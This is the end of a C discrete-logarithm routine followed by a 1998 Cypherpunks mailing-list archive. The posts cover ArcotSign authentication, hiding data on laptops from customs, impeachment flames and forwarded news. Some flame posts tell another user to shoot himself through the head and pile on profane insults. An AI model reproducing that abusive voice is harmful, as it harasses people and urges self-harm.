        bigPow (base, exp, mod, b);
        bigPow (val, exp, mod, v);

        printf ("Trying dlog with factor: "); fBigPrint (factors[i], stdout);
        printf ("b: "); fBigPrint (b, stdout);
        printf ("v: "); fBigPrint (v, stdout);

        /* Special case for 2, pollardrho doesn't work too well on it */
        if (bigCompare (factors[i], two) == 0) {
            if (bigCompare (b, v) == 0) {
                dlogs[i] = bigInit(1);
            } else if (bigCompare (v, one) == 0) {
                dlogs[i] = bigInit(0);
            } else {
                printf ("Inconsistent b, v for factor == 2\n");
                exit (1);
            }
        } else {
            /* Now find log of v mod b, has group order factors[i] */
            dlogs[i] = pollardrho (b, v, mod, factors[i]);
        }
        printf ("dl: "); fBigPrint (dlogs[i], stdout);
        bigPow (b, dlogs[i], mod, b);
        if (bigCompare (b, v) != 0) {
            printf ("Error in discrete log calc!\n");
            exit (1);
        }
    }

    /* Combine results with CRT */
    dl = crtmult (dlogs, factors, n);

    return dl;
}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: proff@iq.org
Date: Tue, 22 Sep 1998 12:38:31 +0800
To: schneier@counterpane.com (Bruce Schneier)
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <4.0.2.19980922114142.00956610@mail.visi.com>
Message-ID: <19980922174008.17487.qmail@iq.org>
MIME-Version: 1.0
Content-Type: text/plain



> >the legitimate user has, excepting the 'remembered secret'. Or is
> >there anything wrong with my logic?
> 
> Yes.  There is something wrong with you logic.
> 
> Bruce
> **********************************************************************
> Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098

There's something wrong with you grammer.

Cheers,
Julian.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Tue, 22 Sep 1998 13:00:33 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Stego-empty hard drives... (fwd)
In-Reply-To: <199809221504.KAA03594@einstein.ssz.com>
Message-ID: <3.0.5.32.19980923040020.0080d6d0@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 10:04 AM 9/22/98 -0500, Jim Choate wrote:
>>Reeza! wrote:
>> The first assertion is not entirely accurate-
>
>Which first assertion, his or mine? Youre quoting leaves me confused (not
>that it is necessarily your fault...;).

His.

>
>> I played with Magic Folders
>> for a while- it relies on a command, usu. in the autoexec.bat or win.ini
>> file (dos/windows environment) to load, with a bootable floppy disk these
>> commands would would be bypassed and the so-called "hidden" folder is in
>> plain sight. 
>
>One thing is clear, you can't mundge the base OS or else the catch is going
>to be trivial.
>

Ain't it the truth. :b

Reeza!

"...The world was on fire, but no one could save me but you...
	Strange what desire will make foolish people do...
		(and the background vocalists sang)
			This world is only gonna break your heart...."

					==C.I.==




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 22 Sep 1998 21:13:37 +0800
To: cypherpunks@toad.com
Subject: SLICK WILLIE'S SHITHOUSE SPECIAL!!!
Message-ID: <199809230206.EAA32637@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



SLICK WILLIE'S SHITHOUSE SPECIAL!!!
	-----------------------------------

  For a limited time, Slick Willie is offering you a chance to 
  provide your future children with a Conception-to-Grave life
  experience.
  For a campaign contribution of $1 million, you can conceive
  your child in the Lincoln bedroom and guarantee their burial
  at the Arlington National Cemetery.
  For an addition half-million dollar donation, Slick Willie is
  offering coupons your future children can use to live off of
  Federal Farm Subsidies or Welfare, depending on their preference
  for city-living or the country life. 

  ACT NOW! First hundred contributors will be entered in a drawing
  to be held for a pair of Paula Jones' panties! (A signed and
  numbered piece <pardon the pun> from Slick Willie's personal
  collection.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Tue, 22 Sep 1998 13:08:32 +0800
To: Jim Choate <cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Stego-empty hard drives... (fwd)
In-Reply-To: <199809221548.KAA04187@einstein.ssz.com>
Message-ID: <3.0.5.32.19980923040813.007bf100@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 10:48 AM 9/22/98 -0500, Jim Choate wrote:
>Forwarded message:
>
>> Date: Tue, 22 Sep 1998 09:32:49 -0500
>> From: Petro <petro@playboy.com>
>> Subject: Re: Stego-empty hard drives... (fwd)
>
>> 	Why prompt, you installed it, just have the startup stop at a
>> certain point, just simply pause. You hit a couple keys (4-8) and go on.
>> Given this case you don't really need the security of a long passphrase
>> since if they are looking to get in, you've lost already.
>
>You'll probably not want it to stop, simpy wait a few seconds. Also, if
>the passphrase is incorrect you'll not want to issue any error messages.
>
>Stopping the boot may be a good indication of a problem.
>

So offer the disclaimer that it is f*cked up and will be going straight to
the repair shop when you (the traveler) get back to "home". Who are they to
know the difference?

Reeza!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Tue, 22 Sep 1998 13:28:39 +0800
To: Anonymous <cypherpunks@cyberpass.net
Subject: Re: Clinton's fake apologies (fwd)
In-Reply-To: <604c1f67fef5147bd9135cda03e0d7da@anonymous>
Message-ID: <3.0.5.32.19980923042746.007bf140@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



At 01:15 AM 9/23/98 +0900, Anonymous wrote:
>on 20 Sep 1998 at 09:52:24 Reeza! wrote:
>> At 09:21 PM 9/19/98 -0000, Anonymous wrote:
>> >What? To tell a lie is one thing, but ...[etc]
>
>> It was prefaced with "...to tell the truth, the whole truth, and nothing
>> but the truth...".
>> Straighten out your head, you seem to be a few neurons short of a
>> functional synapse.
>> 
>> Reeza!
>
>I understand you think this is persuasive, but I don't understand why.
>
>and then at Sun, 20 Sep 1998 15:26:05 Reeza! wrote:
>> At 03:24 AM 9/20/98 -0000, Anonymous wrote:
>> >
>> >I agree it's bad. I agree it undermines the justice system a little bit.
>> >But, ... impeachment?
>> >
>> 
>> I could care less if he had an affair, personally. But he had an affair
>> with a subordinate in his direct employ.
>[more]
>
>> I congratulate you for your defense of a person who demonstrably has broken
>> his marriage vows, his oath of public office, and purjured himself while
>> under an additional oath in a court of law.
>
>You do remember from 6 hours earlier that we're talking about lieing?  
>Your raising other issues is irrelevant. You're building up the bogey man.
>[Jim Choate recently described this method as a "Strawman".] 
>I suggested there are things Bill's done that are worse. Are you sure you're
>disagreeing?
>
>Do you have anything worthwhile to bring to the discussion?
>
>> You, too, are a few neurons short of a functional synapse.
>> 
>> I suggest you discuss it with the maker. The best way is large caliber
>> bullet at sufficient velocity to penetrate and exit the cranial cavity.
>> 
>> God speed, you fucking idiot.
>> 
>
>I guess not.
>
>> Reeza!
>
>-- an anonymous aol32 user.
>


Well, it seems I have an admirer. A follower, anyway. Quoting things I said
from two separate posts.
Persuasive, no. Revealing, yes.
I believe the other issues are relevant. When a person micro-focuses on one
instance of one issue, it is easily dismissable. That oversight, that
disregard of clear evidence of malfeasance in many, and every area should
not be ignored just because you think the issue should be simply (and only)
one particular instance of, shall we say, hormone driven behaviour, to put
it mildly.
I'm not building up the bogey man, I'm discussing what I see. What I see,
on every major and minor newstation, is a disgrace. A documented, public
record disgrace.

anonymouse, 32 bit aohell to boot. you must feel very safe. Yours is hardly
the type of post that might necessitate the use of a remailer, so it should
be safe to assume you haven't the courage to stand behind your words, even
as mild as they are.

Fuck you too. I suggest you discuss your lack of a spine with the maker.
See the above for instructions to meet the maker.

Reeza!

"...The world was on fire, but no one could save me but you...
	Strange what desire will make foolish people do...
		(and the background vocalists sang)
			This world is only gonna break your heart...."

					==C.I.==




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Tue, 22 Sep 1998 13:30:25 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Clinton's fake apologies (fwd)
In-Reply-To: <199809221610.SAA07027@rogue.seclab.com>
Message-ID: <3.0.5.32.19980923043148.00811450@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain




>
>Understandable sentiments. The position I can't understand is Jim's,
>of being totally outraged by the lieing under oath regardless of anything
else.
>[although I respect his right to that opinion].
>
>Unfortunately, you now wear the mantle of wanting to put away
>Bill "Al Capone" Klinton not for tax evasion, but for "fibbing".
>
>-- an anonymous aol32 user.
>
>

You must be proud of that sig.
I'll bet you weren't on the list when the list of deceased CIC bodyguards,
friends and associates was posted either.
<sigh>
flush out your head, you aol user. there is more going on here than just
'fibbing'.


Reeza!


"...The world was on fire, but no one could save me but you...
	Strange what desire will make foolish people do...
		(and the background vocalists sang)
			This world is only gonna break your heart...."

					==C.I.==




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 22 Sep 1998 23:23:18 +0800
To: <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <199809230415.GAA08863@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:00 PM 9/21/98 -0700, Kurt Buff wrote:

>I (as a militant atheist) merely say that if you can define your God, I can
>probably prove he doesn't exist. Unless, of course, your definition is so
>broad as to have no meaning in the first place.

As a thinker I find the term atheism dignifies the 
concept of theism, so I find it offensive.  Theists
are primitives and one needn't stoop.

In my religion, saying unprovable things in public
is a stonable offense.

Joe Momma








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 22 Sep 1998 23:20:35 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199809230415.GAA08895@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



To all: 
We don't care so much that WJC did it with Buddy,
or whatever, so much that he lied under oath.

It is only rarely we get the sons of bitches on
tape, and then you'll have to pardon us for 
exploiting it.

What the fuck, the TLAs leveraged their POTUS bugs for
years...

The only regret is that Frank Zappa was not alive
to put it all to music.

Oottoott



Count of Monte Carlo








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 22 Sep 1998 23:20:31 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199809230415.GAA08933@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 07:10 PM 9/21/98 -0500, Jim Choate wrote:
>It is further clear the police don't carry them for their own protection
>either. Wonder why they do carry them?...

The fastest practical way to disable a metazoan is
to puncture the circulatory system supplying
their brain.

Any questions?

"Go for the head shot" 
	-a former employee of the President








  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Schneier <schneier@counterpane.com>
Date: Wed, 23 Sep 1998 07:08:47 +0800
To: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <Pine.LNX.3.96.980921133001.20069A-100000@blackbox>
Message-ID: <4.0.2.19980923070056.0096b380@mail.visi.com>
MIME-Version: 1.0
Content-Type: text/plain



At 07:10 PM 9/22/98 +0100, Mok-Kong Shen wrote:
>Bruce Schneier wrote:
>> 
>> Yes.  There is something wrong with your logic.
>
>Please kindly explain. I like very much to learn from my errors.
>Thank you very much in advance.

Sorry.  I am under NDA.  Hopefully Arcot will explain sooner rather than
later.
I suggest not using the product until you are satisfied.

Bruce
**********************************************************************
Bruce Schneier, President, Counterpane Systems     Phone: 612-823-1098
101 E Minnehaha Parkway, Minneapolis, MN  55419      Fax: 612-823-1590
           Free crypto newsletter.  See:  http://www.counterpane.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Wed, 23 Sep 1998 02:07:46 +0800
To: Bill Stewart <bill.stewart@pobox.com>
Subject: Re: This is a listed crime?
In-Reply-To: <3.0.5.32.19980922231717.0090ba10@idiom.com>
Message-ID: <Pine.BSF.3.96.980923062644.5574F-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 22 Sep 1998, Bill Stewart wrote:

>At 02:39 PM 9/21/98 -0400, Duncan Frissell wrote:
>>False.  You are never required to talk to a peace officer, Fed, or
>>investigator unless you want to.  They can arrest you of course (with
>>probable cause ha ha).  Even then, you still don't have to talk to them.
>>In criminal cases you *never* have to talk to anyone.
>
>The Supremes have, unfortunately, decided that police can hold you
>for up to 48 hours without getting around to charging you,
>and if there's a weekend around they can often stretch that.
>Some cops find that an interesting answer to the question
>"You've read me my Miranda rights and now you're insisting
>that I tell you what you want before I can speak to my lawyer who's
>in the next room?" "Yup, you can be as silent as you want in the
>county jail, and [since we're charging you with a bogus municipal charge anyway],
>we can charge you with a [bogus] misdemeanor instead.",
>which had a certain craftiness I hadn't really expected out of them :-)
>
>
>				Thanks! 
>					Bill

    Duncan is correct in that they can not make you talk; but as 
    you point out, there is the 48 hour issue, and bogus charges
    which are throwaways, if need be. they are the keeper, you are
    the kept.

    that was part of the point I was making; but they can also charge
    you with obstruction of justice which is one of those were you
    are really left with the burden of proof, not them. it is a whole
    easier to defend a guilty party than it is to defend a party who
    been unjustly charged --as a form of coercion or politics. if their
    is no guilt, on what basis do you defend other than mistaken
    identity and the corrupt officers are firm in their ID --you?

    as a related issue, the public often rails against a judge who
    releases more than average for technical reasons; I dont agree:
    the judge is just more honest and expects "lawless" and LEOs
    to obey the rules.

    jury nullication is a serious risk.  judges believe they have the
    right to define the rules under which you vote and are likely to
    order serious sanctions or even time for defying his house rules.
    I view it as a matter of Constitutional right and the choice of
    arriving at the gate with the truth in hand.  I expect prosecutors
    are including questions on nullification more often.  Aspen, or
    Denver has a case know where a judge is nailing a juror who did not
    volunteer the information she was an advocate of juror's right
    -she did what I would suggest: showed up non-descript, and sat
    there dumb and happy, and never objected to anything. it is 
    highly questionable that she was silent with the intention of
    impeding justice.

    what most Americans are just beginning to grok is that LEOs and
    the Judges are part of an ongoing enterprise which in theory is
    designed to protect us from the forces of evil. however, it must
    be considered that the person on trial is facing a "me v.them"
    arrangement of convenience.

	attila out...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 23 Sep 1998 07:03:47 +0800
To: cryptography@c2.net
Subject: IP: US Easing Bank Rules on Big Cash Transactions
Message-ID: <v04011742b22e8e7dbe2b@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Mon, 05 May 1997 15:44:45 -0500
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: US Easing Bank Rules on Big Cash Transactions
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  New York Times
http://www.nytimes.com/yr/mo/day/news/financial/cash-transactions-reuters.html

September 22, 1998

U.S. Is Easing Bank Rules on Big Cash Transactions

By REUTERS

WASHINGTON -- The Treasury Department announced Monday
that it was trimming its requirements for reporting large cash
transactions. The measures had been introduced to try to curb money
laundering.

Banks had criticized the requirements, the Treasury said, "because they
mandated repetitive paperwork" for routine transactions. The changes
will lighten the banks' paperwork load but will make bankers responsible
for acting as monitors and reporting anything to the authorities that they
think is out of the ordinary and that might indicate criminal activity.

The new rules will permit banks to conduct most transactions with "cash
intensive businesses" without having to report to the Government under
the 1970 Bank Secrecy Act. But banks will still have to file reports on
transactions of $10,000 or more with individuals and with certain types
of businesses.

"This rule does not exempt banks from reporting suspicious activity
involving those exempted activities," the Treasury said. "In addition,
certain categories of businesses, such as real estate brokers, automobile
dealers and money transmitters, may not be exempted."

The reporting requirements were originally established to help law
enforcement officials combat money-laundering by drug dealers and
other criminals who pass large amounts through businesses and banks to
give an appearance of legality.

The new rules, published today in The Federal Register, will permit a
bank to exempt a domestic business that routinely needs large amounts of
cash simply by filing a form stating that the business is exempt. The
business must have been a customer of the bank for at least a year.

Banks, savings institutions and credit unions can begin using the new rules
on Oct. 21.

The Treasury said businesses exempted from reporting rules by a bank
must have their exemptions reviewed every two years. But it said it was
dropping a requirement that banks include details about all of a
customer's transactions on the renewal form.

In 1997, the Treasury said, more than 12 million currency transaction
reports were filed. It said that as a result of the latest rules changes, as
well as an earlier streamlining of reporting requirements for transactions
between banks, financial institutions should be able to reduce such filings
by about 30 percent.

 Copyright 1998 The New York Times Company
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 23 Sep 1998 10:22:00 +0800
To: cypherpunks@cyberpass.net
Subject: Senate panel considers Internet regulations (fwd)
Message-ID: <Pine.GSO.3.95.980923082136.5819G-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Wed, 23 Sep 1998 08:21:29 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
To: politech@vorlon.mit.edu
Subject: Senate panel considers Internet regulations




http://cgi.pathfinder.com/netly/0,2326,201980923-14632,00.html

TIME Digital's Netly News
September 23, 1998

   Senate Panel Mulls Web Regulations
   By Declan McCullagh

   Thought a GOP-led Congress was going to hold off on regulating the
   Internet? Guess again. A Senate panel is meeting this morning to hear
   arguments about a proposal to regulate exactly what information
   commercial web sites may collect from visitors.
   [...remainder snipped...]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Wed, 23 Sep 1998 08:26:44 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: Stego-empty hard drives... (fwd)
In-Reply-To: <199809230223.VAA07985@einstein.ssz.com>
Message-ID: <3608F63F.30A09543@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:

> If there was as much variety at the hardware level as you assume nobody
> could afford to introduce new computers every few months.

Whatever.
 
> Realisticaly it isn't this complicated. All one needs to do is write a
> program that allows the operator to talk directly to the hard drive
> controller. At that point it's a trivial matter to go out and find those
> hidden partitions. You could use normal drive recovery software if you had a
> mind, and that only costs a few hundred to a few thousand dollars and can be
> bought in the back of Computer Shopper.

Yes, and depending on the threat model this was about 5-6 on the last I've last
sent. To get around that, you either modify the hard drive's on board
controller, or you build a CPU emulator.  There is one that's freely available
called Bochs which will do this.  They can happily boot from their floppy and
talk directly to your virtual "hardware" and you still get through.

Yeah, I know, ol'e paranoid Jim will reply to this using the word "Tempest"
signature, to which I reply, if you're that paranoid, tempest shield your
notebook and put in several RF transmitters to spit back pre-recorded tempest
noise to play in synch.

Shit, and why not?  If you're gonna get THAT paranoid, you might as well take
all the precautions in the universe.  Oh, it's too expensive?  Well that's just
waaay too fucking bad.

Gee, but one would have to think, why would they go to that extent and expense
to find hidden bits of data on your drives, and not do body cavity searches and
MRI and XRay scans of your body?  Hell, why don't they buy electron tunneling
microscopes just incase you might have encoded your data on the surface of that
perfectly innocent looking CD jewel case in which you're carrying your music?
 

> Don't bother, I already know how to do that.
> 
> This would stand out like a sore thumb.

Shaaa, now that I've shown you how, of course you already know how to do that. 
Now that I've shown you the code and told you how it works, of course to you it
would stand out like a sore thumb because you know what to look for.  The
question is will it stand out to the minimum wage customs drone?  You seem to
think these guys are actually super spies, not clueless overpaid (for their
level of skills) bored burrowcrats working on an assembly line.  You're over
estimating their abilities by at least four orders of magnitude there.

Gee, I bet you use RSA with 65536 bits too and superencrypt with 3DES, IDEA,
and Blowfish and Misty.

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|       Sunder       |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Wed, 23 Sep 1998 08:29:22 +0800
To: cypherpunks@Algebra.COM
Subject: From Spyking: DNA Technology
Message-ID: <3608F717.C8CC381D@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



****************************************************************
5) From: "Timothy Robarts" <t.robarts@btinternet.com> 
Subject: DNA Technology

London 16/09/98
 
September 16 1998

Police Superintendents' Conference: Stewart Tendler on how science is catching
up with the criminal. 

DNA detectives will fit a face to a flake of skin A SINGLE flake of dandruff
will soon be enough for scientists to build up a criminal's photofit, police
commanders were told yesterday. Experts believe they will be able to create
"genetic e-fits", using information gleaned from a DNA sample to build a
picture of a suspect's race, build, eye and hair colour, and even behavioural
characteristics. Within a year, forensic scientists will be able to take DNA
samples from minute scraps of skin left at the scene of a burglary and from
such surfaces as the steering wheel of a stolen car, the keyboard of a
computer and the outside of a drink can. They will be able to identify DNA
from the
wrappings round illegal drugs that dealers and couriers had hidden in their
bodies. 

The photofit will be available within a decade. It will include the height of
the suspect and other details including the shape of the ears and chin and
inherited physical defects. 

The DNA advances were forecast yesterday by Kevin Sullivan, DNA research and
development manager for the Forensic Science Service, speaking to the annual
conference of the Police Superintendents' Association in Bristol. He said that
genetic profiling was the "Holy Grail" for scientists but would be achieved
within ten years, aided by international work on gene identification. 

Dr Sullivan, who worked on the identification of the remains of the last Tsar,
Nicholas II, said that the breakthrough in taking DNA samples from dandruff
would allow investigators to take material from the tiny particles of human
skin that are found at every scene. He said: "People are constantly shedding
skin cells. The majority of household dust is made up of dead skin and we know
we can get DNA from an individual skin cell." 

He said that an armed robber could be tracked down by DNA evidence taken
within 12 months from flakes of dandruff left behind in a discarded
balaclava. It
is a person's DNA, contained in every cell in the body, which predicts an
enormous
range of characteristics including skin, hair and eye colour, bone structure
and even propensity to some illnesses and personality traits. 

He told the conference that DNA testing had become "1,000 times more
sensitive" in the past decade. Whereas ten years ago scientists needed a
bloodstain the
size of a 10p piece to conduct a test, they now required just a pin-prick
invisible to the naked eye. 

DNA samples would soon be used to re-examine unsolved sex cases and could even
be used in miscarriage-of-justice cases. Scientists were working on ways of
extracting DNA from sperm samples taken many years ago and still being
stored. 

New developments meant it was possible to identify bodies that had been hidden
for some time. DNA can be taken from hair shafts in the skull, from bone and
faeces and matched with the mothers of possible victims. 

Work was developing on portable DNA testing facilities which could be used at
the scenes of crimes to speed up investigations. Dr Sullivan said mass
screening in major inquiries had grown. Since the first screening in 1987,
in a double murder case in Leicestershire, there had been 91 screening
operations
in Britain involving 26,000 samples. Offenders were identified in 30 cases and
in one case a suspect walked into a police station and gave himself up when
DNA screening was announced by police. 

Dr Sullivan said that in the next five years scientists would improve the
collection of DNA samples from blood and saliva left on surfaces such as
cigarettes. Further work on identifying DNA in animals would begin next year.
He said this could be used to solve crimes against humans. Children who were
assaulted sometimes left hairs from their pets on the clothing of their
attackers, which could be used to identify suspects. 

Tim Robarts - <mailto:t.robarts@btinternet.com>t.robarts@btinternet.com -
http://www.robarts.com
 
****************************************************************
6) From: Will Smith <the-mib@rocketmail.com>
Subject: Anonymous Net?

Hi there. Do you know of any stealth program's the will stop my
movement being tracked on the net  i.e.:  where in surfing, what sites i'm
going to, what OS i'm running ect, my e-mail address ect...

like a real-time netshield or fire-wall?

to keep the $pooks from trackin me online? 

The-MIB

****************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William Whyte <wwhyte@baltimore.ie>
Date: Wed, 23 Sep 1998 03:39:33 +0800
To: "'Anonymous'" <cryptography@c2.net>
Subject: RE: ArcotSign
Message-ID: <01BDE6D6.415B1540.wwhyte@baltimore.ie>
MIME-Version: 1.0
Content-Type: text/plain



> For this to work, the public key has to be kept secret(!).
>...
> As Greg points out, much the same could be accomplished simply by having
> the servers share secret 3DES keys with their users, each user having his
> own private 3DES key.  The users could encrypt messages using their 3DES
> key and the server would decrypt using the appropriate key, which would
> also serve to authenticate the user.

The difference between this scheme and a shared-secret scheme (if I
understand this scheme correctly) is that Arcot's infrastructure gives
you non-repudiation -- the central server can't forge authenticated
messages from you -- and so it's suitable for transactions of value
in a way that a shared-secret scheme isn't.

Cheers,

William




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Laurie <ben@algroup.co.uk>
Date: Wed, 23 Sep 1998 03:59:58 +0800
To: David Jablon <dpj@world.std.com>
Subject: Re: ArcotSign (was Re: Does security depend on hardware?)
In-Reply-To: <Pine.LNX.3.96.980921133001.20069A-100000@blackbox>
Message-ID: <3608B833.DA9AC6FE@algroup.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



David Jablon wrote:
> 
> Bruce Schneier wrote:
> >> The advantages are that offline password guessing is impossible.
> 
> At 03:24 PM 9/22/98 +0100, Ben Laurie wrote:
> > The 'I' word always makes me nervous - do you really mean that, or do
> > you just mean "very difficult"?
> 
> Why be nervous?  It's not that hard to prevent off-line
> guessing of the PIN, given access to just the client's stored
> data.  Here "impossible" means "as hard as breaking your
> favorite PK method".

Which is:

a) not impossible
b) not proven to be as difficult as we think it is (cf. quantum
computers, novel factorisation methods).

That's why.

Cheers,

Ben.

-- 
Ben Laurie            |Phone: +44 (181) 735 0686| Apache Group member
Freelance Consultant  |Fax:   +44 (181) 735 0689|http://www.apache.org/
and Technical Director|Email: ben@algroup.co.uk |
A.L. Digital Ltd,     |Apache-SSL author     http://www.apache-ssl.org/
London, England.      |"Apache: TDG" http://www.ora.com/catalog/apache/

WE'RE RECRUITING! http://www.aldigital.co.uk/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 23 Sep 1998 09:43:58 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Stego-empty hard drives... (fwd)
Message-ID: <199809231511.KAA10445@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 23 Sep 1998 09:23:11 -0400
> From: Sunder <sunder@brainlink.com>
> Subject: Re: Stego-empty hard drives... (fwd)

> Yes, and depending on the threat model this was about 5-6 on the last I've last
> sent. To get around that, you either modify the hard drive's on board
> controller, or you build a CPU emulator.  There is one that's freely available
> called Bochs which will do this.  They can happily boot from their floppy and
> talk directly to your virtual "hardware" and you still get through.

How do you propose to start this hardware emulator when it's boot file isn't
on their boot floppy?

And you think customs agents using software and TEMPEST signature scanning
is out in the woods....


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 23 Sep 1998 10:10:10 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Stego-empty hard drives... (fwd)
Message-ID: <199809231538.KAA10721@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 24 Sep 1998 17:02:48 +0200
> From: "Albert P. Franco, II" <apf2@ctv.es>
> Subject: Re: Stego-empty hard drives... (fwd)

> I can't imagine that anyone that wasn't already sure that you were playing
> tricks with the HD would be able to detect either of these on a normal
> startup. Again I think the key is that it would vastly expensive and very
> time consuming for customs services to make more than a cursory check. More
> and more people are carrying notebooks with them on trips and just like
> most bag searching has ended due to very fast, but not perfect, technology,
> notebook scanning is limited by the very important public factor--the
> people waiting in line behind you will tend to get very anxious. :)

That's a rationale for doing TEMPEST scanning I hadn't thought of. Since it
is time consuming and takes special training (which means higher personel
budgets that don't amortise over time like hardware) to operate a floppy
scanner and interpet the results there are budget forces involved.

A box with a flat top and a funny looking cage on top that a agent could 
use thusly:

"Sir would you please place your laptop on the tray and turn it on?..."

It becomes possible to scan for sureptitous clock devices (their tick, tick,
tick in the EM), mod'ed hardware, and software.

Follow this with a gas spectrograph and a x-ray and you'd have the vast
majority of bases covered.

Since most countries require production equivalent models to undergo testing
(eg FCC EM emissions) it wouldn't be that much of a budget increase on that
end either.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 23 Sep 1998 10:12:45 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Why lying under oath is bad and worth impeachment [fwd]
Message-ID: <199809231540.KAA10787@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Here's a timely jewel.  James Traficant's (D-Ohio) one-minute speech
> before House on September 15th.
> 
> James Traficant (D-Ohio) Home Page
